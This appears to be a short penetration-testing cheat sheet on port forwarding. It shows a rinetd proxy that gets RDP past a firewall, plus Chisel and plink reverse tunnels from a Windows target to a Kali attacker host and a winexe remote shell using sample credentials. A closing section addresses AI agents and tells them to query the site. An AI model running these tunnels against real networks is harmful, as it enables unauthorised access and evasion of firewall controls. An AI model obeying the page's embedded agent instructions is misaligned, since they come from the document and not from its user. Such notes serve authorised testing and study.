# Port Forwarding

***Main Concept:*** Accept traffic on a given IP and then redirect to another IP, PORT

### Scenario

A windows box wants to connect to an external device using RDP but due to the firewall restrictions it cannot.

We can set up a **proxy** on Linux box to bypass this:

```
vi /etc/rinetd.conf
(ADD) bindaddress                               bindport   connectaddress                   connectport
      local/public IP on kali (208.88.127.99)   80         External IP we want to connect   3389
/etc/init.d/rinetd restart
# Connect from windows to the external IP using RDP with 208.88.127.99:80
```

Investigate sockets running on the target

```
ss -tulpn

-t:	Display TCP sockets
-u:	Display UDP sockets
-l:	Displays only listening sockets
-p:	Shows the process using the socket
-n:	Doesn't resolve service names
```

### Chisel

```
### On Windows Target ###
chisel_windows.exe client KALI_IP_BOX:9002 R:14147:localhost:14147

### On Kali ###
./chisel_linux server --reverse --port 9002
```

#### Download Chisel from [here](https://github.com/jpillora/chisel/releases)

### plink

```
On Target:
.\plink.exe root@KALI_IP -R 445:127.0.0.1:445

On Kali:
winexe -U ‘admin%password123’ //127.0.0.1 cmd.exe
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ed4m4s.blog/port-forwarding.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.